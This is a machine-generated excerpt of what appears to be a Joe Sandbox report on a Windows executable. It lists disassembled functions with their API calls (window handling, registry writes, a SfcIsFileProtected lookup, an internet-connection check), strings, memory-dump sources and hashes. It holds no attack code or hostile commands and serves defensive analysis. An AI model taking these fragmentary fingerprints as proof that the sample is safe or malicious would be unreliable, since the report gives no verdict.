                                                                                  Strings
                                                                                  • Destination did not have drive specifier, xrefs: 00444246
                                                                                  • Destination was less than 2 characters, xrefs: 00444203
                                                                                  • Destination contains invalid character, xrefs: 004442BC
                                                                                  • Destination was empty, xrefs: 004441EE
                                                                                  • Source includes wildcards but destination has a file name at the end, xrefs: 004442ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Destination contains invalid character$Destination did not have drive specifier$Destination was empty$Destination was less than 2 characters$Source includes wildcards but destination has a file name at the end
                                                                                  • API String ID: 3519838083-2371027411
                                                                                  • Opcode ID: 11ad46ddd213795edeabb213814f3fea095e49d02d1329c029afe43c78a322ae
                                                                                  • Instruction ID: e728cf5abf40f8b6c25cba219de29e8f1bd5826e9a65f2d28502286fbbff087a
                                                                                  • Opcode Fuzzy Hash: 11ad46ddd213795edeabb213814f3fea095e49d02d1329c029afe43c78a322ae
                                                                                  • Instruction Fuzzy Hash: 4C410934B002409BDB14EF29C496FBE77A1AF85774F14831FF521972D1CBB95981824A
                                                                                  Function 004C8D50 Relevance: 10.6, APIs: 7, Instructions: 122windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 004C8D84
                                                                                  • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004C8DAD
                                                                                  • UpdateWindow.USER32(?), ref: 004C8DC9
                                                                                  • SendMessageA.USER32(?,00000121,00000000,?), ref: 004C8DEF
                                                                                  • SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 004C8E0E
                                                                                  • UpdateWindow.USER32(?), ref: 004C8E51
                                                                                  • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004C8E84
                                                                                    • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                  • String ID:
                                                                                  • API String ID: 2853195852-0
                                                                                  • Opcode ID: b25e39f447ed8bb7f1bb735a67a957c05e60400dbf717a5a4f8a083d8e78e9b4
                                                                                  • Instruction ID: 7a74a5d57689387ddcaf2bf0164c2395184b93e5bc57ec4b1ed4e2d028452b4d
                                                                                  • Opcode Fuzzy Hash: b25e39f447ed8bb7f1bb735a67a957c05e60400dbf717a5a4f8a083d8e78e9b4
                                                                                  • Instruction Fuzzy Hash: D941AF346047419BD760DF268C88F1BBAF4FFD5B54F104A2EF48286292CB79C945CB6A
                                                                                  Function 004241EC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00424210
                                                                                  • __ftol.LIBCMT ref: 00424222
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: __ftol$H_prolog
                                                                                  • String ID: Checked$ItemData$Selected$Text
                                                                                  • API String ID: 2516785518-779246079
                                                                                  • Opcode ID: a35c3e90b4fe907689026ab3e3feba8a64bfb34938237e79568cab6737b08971
                                                                                  • Instruction ID: 7dbbf9e458c36e5749a9129b95461df057a6c111d5b48fc50b55a5daca1ce7d6
                                                                                  • Opcode Fuzzy Hash: a35c3e90b4fe907689026ab3e3feba8a64bfb34938237e79568cab6737b08971
                                                                                  • Instruction Fuzzy Hash: 2231E671600210BAD7117BA78C82FBF366CDFC1B98F14440FF9056A192DB6D5D8267AE
                                                                                  Function 004605C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(?), ref: 004605D9
                                                                                  • GetNextDlgTabItem.USER32(?,?,?), ref: 00460601
                                                                                  • GetNextDlgTabItem.USER32(00000000,00000000,?), ref: 00460671
                                                                                    • Part of subcall function 004C932E: GetDlgItem.USER32(?,?), ref: 004C933C
                                                                                  • IsWindow.USER32(?), ref: 004606C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$NextWindow
                                                                                  • String ID: !$tTQ
                                                                                  • API String ID: 3345120248-2224091262
                                                                                  • Opcode ID: 494654775a3f53cb91d98aefb662bad36c9c0441901bfd4f55049fd52177b9a4
                                                                                  • Instruction ID: b77a0f2f3527bad80a4bab2de26ea082354b571cbcc979fd8a8c299e6b3a3192
                                                                                  • Opcode Fuzzy Hash: 494654775a3f53cb91d98aefb662bad36c9c0441901bfd4f55049fd52177b9a4
                                                                                  • Instruction Fuzzy Hash: 0631C1716042529FCB258F29C848A6FB7A9EFC4751F05022EE802DB2A1DB34CC11CB99
                                                                                  Function 0045844D Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateSolidBrush.GDI32(?), ref: 0045846B
                                                                                  • GetObjectA.GDI32(?,0000000C,?), ref: 00458482
                                                                                  • GetSysColor.USER32(0000000F), ref: 0045849D
                                                                                  • GetSysColor.USER32(0000000F), ref: 004584B8
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 004584BB
                                                                                  • GetSysColor.USER32(0000000F), ref: 004584D1
                                                                                  • CreateSolidBrush.GDI32(?), ref: 004584FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: BrushColorCreateSolid$Object
                                                                                  • String ID:
                                                                                  • API String ID: 2949401836-0
                                                                                  • Opcode ID: 62c2c0b5e8d092c46cb0eaaf2b58ccf12773ce50326d95b7c6a4c558317b4346
                                                                                  • Instruction ID: 5fd8f3a04d7d7f6dbd2283b6caeb19ace0a1c8af8b2773bb235d4debcd9c45a8
                                                                                  • Opcode Fuzzy Hash: 62c2c0b5e8d092c46cb0eaaf2b58ccf12773ce50326d95b7c6a4c558317b4346
                                                                                  • Instruction Fuzzy Hash: DE21B134600611EFCB51AB25C884B2EB3E5BF48B45F01412EED56AB752DF38EC09CB99
                                                                                  Function 004B4AFB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(00526E2C), ref: 004B4B12
                                                                                  • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4B27
                                                                                    • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                    • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                  • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4B56
                                                                                  • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4B9B
                                                                                  • InterlockedDecrement.KERNEL32(00526E2C), ref: 004B4BC0
                                                                                    • Part of subcall function 004B6355: RtlLeaveCriticalSection.NTDLL ref: 004B6362
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Decrement$CriticalSection$EnterIncrementInitializeLeave
                                                                                  • String ID: ,nR
                                                                                  • API String ID: 2133288049-2953646183
                                                                                  • Opcode ID: 06353121966184c96b89915dd8aff122bb503d95dbead61f9003243a5f485708
                                                                                  • Instruction ID: 022256119f148c4c2e779ce32b5b478b08c6e2fbaaf7fc2c74051299f02b724c
                                                                                  • Opcode Fuzzy Hash: 06353121966184c96b89915dd8aff122bb503d95dbead61f9003243a5f485708
                                                                                  • Instruction Fuzzy Hash: 60212C31408204FADF117F559C81FDE7768AF91325F21012FF214161C3DA7CE942A639
                                                                                  Function 004C82BF Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 004C82CC
                                                                                  • GetWindowRect.USER32(?,?), ref: 004C82E6
                                                                                  • ScreenToClient.USER32(?,?), ref: 004C82F9
                                                                                  • ScreenToClient.USER32(?,?), ref: 004C8302
                                                                                  • EqualRect.USER32(?,?), ref: 004C830C
                                                                                  • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 004C8334
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 004C834C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                  • String ID:
                                                                                  • API String ID: 443303494-0
                                                                                  • Opcode ID: 18b85774aa58995e3236296be1b4092650a87eded5494399d91a840405cafc11
                                                                                  • Instruction ID: ac089cc528e89377b988b5bdcd533a9f7ec59a469f36123118a614ed86cc77a1
                                                                                  • Opcode Fuzzy Hash: 18b85774aa58995e3236296be1b4092650a87eded5494399d91a840405cafc11
                                                                                  • Instruction Fuzzy Hash: 76114F75600249BFE7108F68DC88EBB7BBDEB98750F10852EB91597265EB31ED008B64
                                                                                  Function 00480127 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: %.6x$dec$format$h$hex
                                                                                  • API String ID: 3519838083-702273395
                                                                                  • Opcode ID: 93acad5bdd7aaba1011b209201bc856cd8f6d7e101bb031f621f958fdc823553
                                                                                  • Instruction ID: 117082e35f7c37181ea1e7285ce6b1896d589c41310ddc10f6cbb96157a5ac15
                                                                                  • Opcode Fuzzy Hash: 93acad5bdd7aaba1011b209201bc856cd8f6d7e101bb031f621f958fdc823553
                                                                                  • Instruction Fuzzy Hash: 9C21D171A00629ABCF12DFA9DC01AEFBBB5FF84714F00841AB815A7281C6B49A11D798
                                                                                  Function 004D4D25 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 004D4D53
                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 004D4D76
                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 004D4D95
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004D4DA5
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004D4DAF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreate$Open
                                                                                  • String ID: software
                                                                                  • API String ID: 1740278721-2010147023
                                                                                  • Opcode ID: 222ed3f80c73bdefd4df0e2bbd9bf408132d76e15e99b0af52c61c1c01df6947
                                                                                  • Instruction ID: fa30b18072e457b87f051d74cc30acd24091d42080682782355992586c53e875
                                                                                  • Opcode Fuzzy Hash: 222ed3f80c73bdefd4df0e2bbd9bf408132d76e15e99b0af52c61c1c01df6947
                                                                                  • Instruction Fuzzy Hash: 7811E672900158FBCB11CB96CC84DEFFFBDEFD5744F1000ABA504A2222D2719A00DB64
                                                                                  Function 004104AA Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(Sfc.dll), ref: 004104BB
                                                                                  • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004104CF
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0041050A
                                                                                  • FreeLibrary.KERNEL32(?), ref: 00410524
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressByteCharFreeLoadMultiProcWide
                                                                                  • String ID: Sfc.dll$SfcIsFileProtected
                                                                                  • API String ID: 344494338-411519151
                                                                                  • Opcode ID: 5f7be1c675b036553d45c8a8721155a54f8b4541e35b3b93d54a37f2ab9d50e7
                                                                                  • Instruction ID: d0eb5cbdaeaeaaf074f4c31dbdc265b80a1d5723da54da60d6c2dbc83f231219
                                                                                  • Opcode Fuzzy Hash: 5f7be1c675b036553d45c8a8721155a54f8b4541e35b3b93d54a37f2ab9d50e7
                                                                                  • Instruction Fuzzy Hash: C501A771600224BBDB209BA9DC88DDBBBACFF08750F1002A1F615D6291D6B45E80CB99
                                                                                  Function 004A0760 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsBadStringPtrA.KERNEL32(00000000,00000000), ref: 004A076F
                                                                                  • lstrlen.KERNEL32(00000000,?,00000000,?), ref: 004A0781
                                                                                  • WriteFile.KERNEL32(?,00000000,00000000), ref: 004A0794
                                                                                  • WriteFile.KERNEL32(?,00511394,00000002,?,00000000), ref: 004A07A5
                                                                                  • WriteFile.KERNEL32(?,???,00000005,?,00000000), ref: 004A07C2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$Stringlstrlen
                                                                                  • String ID: ???
                                                                                  • API String ID: 3955047007-928449859
                                                                                  • Opcode ID: 95e4e759bab473608fee8448c50d5580fc38ffd756fbbfa8a2151f3970e3437f
                                                                                  • Instruction ID: 6b3c03d80649553f8eaaa36fc563d4d80a87eb9919f7f150c6a747e768b693af
                                                                                  • Opcode Fuzzy Hash: 95e4e759bab473608fee8448c50d5580fc38ffd756fbbfa8a2151f3970e3437f
                                                                                  • Instruction Fuzzy Hash: D7F081762053117FE2009B54EC44FDB779CAF95B50F024419F600E6154D274A84A8BA5
                                                                                  Function 004081CE Relevance: 10.5, APIs: 7, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(0000000F), ref: 004081DA
                                                                                  • GetSysColor.USER32(00000012), ref: 004081E1
                                                                                  • GetSysColor.USER32(0000000F), ref: 004081EB
                                                                                  • GetSysColor.USER32(00000012), ref: 004081F5
                                                                                  • GetSysColor.USER32(0000000F), ref: 004081FF
                                                                                  • GetSysColor.USER32(00000012), ref: 00408209
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,0040734C), ref: 0040821F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 1573920590-0
                                                                                  • Opcode ID: 71138dffe68b57ab93e7dc671ffb905f698ed112d37f094e20794f56946cad89
                                                                                  • Instruction ID: fb83359dd061ed59437400ccfdca853c3cd07ac22ae821cbf7658d3d1c2999dc
                                                                                  • Opcode Fuzzy Hash: 71138dffe68b57ab93e7dc671ffb905f698ed112d37f094e20794f56946cad89
                                                                                  • Instruction Fuzzy Hash: 9CF0DA70940744AEE7306F729C09F97BAE0FF90750F02883EE2959B1D1DAB5A450EF10
                                                                                  Function 004409F9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(WININET.DLL,?,?,00440790), ref: 00440A01
                                                                                  • LoadLibraryExA.KERNEL32(WININET.DLL,00000000,00000008,?,?,00440790), ref: 00440A11
                                                                                  • GetProcAddress.KERNEL32(00000000,InternetGetConnectedState), ref: 00440A23
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00440790), ref: 00440A35
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
